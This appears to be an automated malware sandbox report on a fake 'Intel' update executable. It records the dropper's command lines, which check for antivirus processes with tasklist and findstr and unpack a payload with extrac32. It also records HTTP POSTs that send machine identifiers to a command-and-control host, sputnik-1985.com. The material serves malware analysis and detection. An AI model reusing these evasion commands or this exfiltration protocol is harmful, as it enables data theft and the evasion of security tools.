                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=inqfan4cl7mtggt4mvt0sfbntn; expires=Sat, 03 May 2025 08:32:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gHsywU%2BXxAnDWsqllTPYHs68ZkmS8iVar4HH3H4EsrKFn9xImRwjCkHE%2BoCHBBuzxTh0LP6bkolgG6sux53jR7xyJGMNh5l3F5PqDIm00yfYHxmHrinEUgyWdAiau0JjFCqs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8fe4bc1a0d6bde95-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1668&rtt_var=641&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2841&recv_bytes=15991&delivery_rate=1684939&cwnd=242&unsent_bytes=0&cid=753559b3f9130728&ts=424&x=0"
                                                                                                                                                                                                            2025-01-07 14:46:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                            2025-01-07 14:46:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            5192.168.2.650741104.21.64.14436596C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-07 14:46:01 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=IMCRUI6Y
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 19905
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-07 14:46:01 UTC15331OUTData Raw: 2d 2d 49 4d 43 52 55 49 36 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 44 42 37 38 36 34 35 39 37 35 44 33 31 30 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 49 4d 43 52 55 49 36 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 49 4d 43 52 55 49 36 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 4d 72 53 61 6c 74 0d 0a 2d 2d 49 4d 43 52 55 49 36 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
                                                                                                                                                                                                            Data Ascii: --IMCRUI6YContent-Disposition: form-data; name="hwid"E7DB78645975D310822D1F4978021086--IMCRUI6YContent-Disposition: form-data; name="pid"3--IMCRUI6YContent-Disposition: form-data; name="lid"HpOoIh--@MrSalt--IMCRUI6YContent-Dispos
                                                                                                                                                                                                            2025-01-07 14:46:01 UTC4574OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 02 0e 8d a5 f6 3d 72 d7
                                                                                                                                                                                                            Data Ascii: 2+?2+?o?Mp5p_oI=r
                                                                                                                                                                                                            2025-01-07 14:46:01 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Tue, 07 Jan 2025 14:46:01 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=u87lj2sbo9kovecjj4a067ec1n; expires=Sat, 03 May 2025 08:32:40 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7%2FOfG2ZVGb4RVK9TCPpnfgEg2lVKOLddlYJ3M9kO3cb49VVEL4thyxka4rqINljD2AeyJjRul9Rmpu6PeTx%2B%2F7%2B4C8mkxK8YGwetbuaSxzdLkVWBjYoRdffS9PDjeZF3%2BQnv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8fe4bc20da0bde95-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1595&rtt_var=619&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2841&recv_bytes=20857&delivery_rate=1738095&cwnd=242&unsent_bytes=0&cid=06f08556162db9ff&ts=660&x=0"
                                                                                                                                                                                                            2025-01-07 14:46:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                            2025-01-07 14:46:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            6192.168.2.650742104.21.64.14436596C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-07 14:46:02 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=6KRRDE5XR5UF0L
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 901
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-07 14:46:02 UTC901OUTData Raw: 2d 2d 36 4b 52 52 44 45 35 58 52 35 55 46 30 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 44 42 37 38 36 34 35 39 37 35 44 33 31 30 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 36 4b 52 52 44 45 35 58 52 35 55 46 30 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 4b 52 52 44 45 35 58 52 35 55 46 30 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 4d 72 53 61 6c 74 0d 0a 2d 2d 36 4b 52 52 44 45
                                                                                                                                                                                                            Data Ascii: --6KRRDE5XR5UF0LContent-Disposition: form-data; name="hwid"E7DB78645975D310822D1F4978021086--6KRRDE5XR5UF0LContent-Disposition: form-data; name="pid"1--6KRRDE5XR5UF0LContent-Disposition: form-data; name="lid"HpOoIh--@MrSalt--6KRRDE
                                                                                                                                                                                                            2025-01-07 14:46:02 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Tue, 07 Jan 2025 14:46:02 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=ri7erqlhtiqvb9d0ipllqdq7hb; expires=Sat, 03 May 2025 08:32:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=goXvU%2BT6c7rGqtEwGFx9mkSRZFtG5s5XnHT24NtlKhU%2FpW5ib4fJXHHLgNXz7%2FO184oVH9G%2Fig3zogHnqeULLz%2BDtnY36dZ3DG2wKk3meVQSFPGUVQ0ZKsMnbv%2FBHz3yP%2F1Y"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8fe4bc2938a842e9-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1711&rtt_var=855&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4220&recv_bytes=1813&delivery_rate=106208&cwnd=240&unsent_bytes=0&cid=6db52dc23de2f83a&ts=374&x=0"
                                                                                                                                                                                                            2025-01-07 14:46:02 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                            2025-01-07 14:46:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            7192.168.2.650743104.21.64.14436596C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-07 14:46:03 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=RI2MFGUI
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 1074
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-07 14:46:03 UTC1074OUTData Raw: 2d 2d 52 49 32 4d 46 47 55 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 44 42 37 38 36 34 35 39 37 35 44 33 31 30 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 52 49 32 4d 46 47 55 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 49 32 4d 46 47 55 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 4d 72 53 61 6c 74 0d 0a 2d 2d 52 49 32 4d 46 47 55 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
                                                                                                                                                                                                            Data Ascii: --RI2MFGUIContent-Disposition: form-data; name="hwid"E7DB78645975D310822D1F4978021086--RI2MFGUIContent-Disposition: form-data; name="pid"1--RI2MFGUIContent-Disposition: form-data; name="lid"HpOoIh--@MrSalt--RI2MFGUIContent-Dispos
                                                                                                                                                                                                            2025-01-07 14:46:04 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Tue, 07 Jan 2025 14:46:04 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=l1i8bc7ua6kps75a9o0tb770u6; expires=Sat, 03 May 2025 08:32:42 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QlA3fC4VE5WliCb78Pplp3YfDGpbJ%2BmpuPsCVWv2ZXY%2FiilF0cS1Bh0eDrnZqhzHf%2BGc%2F%2BremNxhbUkjGzoIiRUlvcts0ZqUxieEJg7XvVobDv1v58YDN23PTN18yEtDXjOR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8fe4bc313bd07c6a-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2273&min_rtt=2070&rtt_var=922&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1981&delivery_rate=1410628&cwnd=218&unsent_bytes=0&cid=86f57ba89fe6bece&ts=550&x=0"
                                                                                                                                                                                                            2025-01-07 14:46:04 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                            2025-01-07 14:46:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            8192.168.2.650744104.21.64.14436596C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-07 14:46:04 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 116
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-07 14:46:04 UTC116OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 4d 72 53 61 6c 74 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 45 37 44 42 37 38 36 34 35 39 37 35 44 33 31 30 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36
                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--@MrSalt&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=E7DB78645975D310822D1F4978021086
                                                                                                                                                                                                            2025-01-07 14:46:05 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Tue, 07 Jan 2025 14:46:05 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=g9p9amo0g73kp7gfg579thmcq5; expires=Sat, 03 May 2025 08:32:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U6psQxi0PI4SZjz%2BTql5Nm2vyS3v%2Blh0lOcZO3et%2BIUWc58dPPJcWt9NjEh9sZwTFDlyrj5%2BGch35rBDF7CaMykF9pOmmvRnBH4WsQ3QamaxJl7iRXd4WrcYnz%2BMgUiX9CVP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8fe4bc3879068ca1-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1943&min_rtt=1943&rtt_var=971&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4220&recv_bytes=1017&delivery_rate=254355&cwnd=168&unsent_bytes=0&cid=c50fcc35c48cc858&ts=622&x=0"
                                                                                                                                                                                                            2025-01-07 14:46:05 UTC54INData Raw: 33 30 0d 0a 2f 61 6e 37 36 42 35 75 64 31 46 41 52 49 64 37 62 44 37 4f 73 63 38 66 2b 6c 5a 46 75 51 49 52 58 34 71 6b 63 37 30 46 50 66 4b 6d 39 41 3d 3d 0d 0a
                                                                                                                                                                                                            Data Ascii: 30/an76B5ud1FARId7bD7Osc8f+lZFuQIRX4qkc70FPfKm9A==
                                                                                                                                                                                                            2025-01-07 14:46:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:09:45:12
                                                                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:1'119'746 bytes
                                                                                                                                                                                                            MD5 hash:25B4BAC0866214DF0BCB32A8DC280555
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                            Start time:09:45:13
                                                                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c move Cloudy Cloudy.cmd & Cloudy.cmd
                                                                                                                                                                                                            Imagebase:0x1c0000
                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                            Start time:09:45:13
                                                                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                            Start time:09:45:16
                                                                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                                                            Imagebase:0xff0000
                                                                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                            Start time:09:45:16
                                                                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                            Imagebase:0xca0000
                                                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                            Start time:09:45:16
                                                                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                                                            Imagebase:0xff0000
                                                                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                            Start time:09:45:16
                                                                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                            Imagebase:0xca0000
                                                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                            Start time:09:45:17
                                                                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:cmd /c md 686536
                                                                                                                                                                                                            Imagebase:0x1c0000
                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                            Start time:09:45:17
                                                                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:extrac32 /Y /E Justify
                                                                                                                                                                                                            Imagebase:0xc70000
                                                                                                                                                                                                            File size:29'184 bytes
                                                                                                                                                                                                            MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                            Start time:09:45:17
                                                                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:findstr /V "Backing" Kelly
                                                                                                                                                                                                            Imagebase:0xca0000
                                                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                            Start time:09:45:17
                                                                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
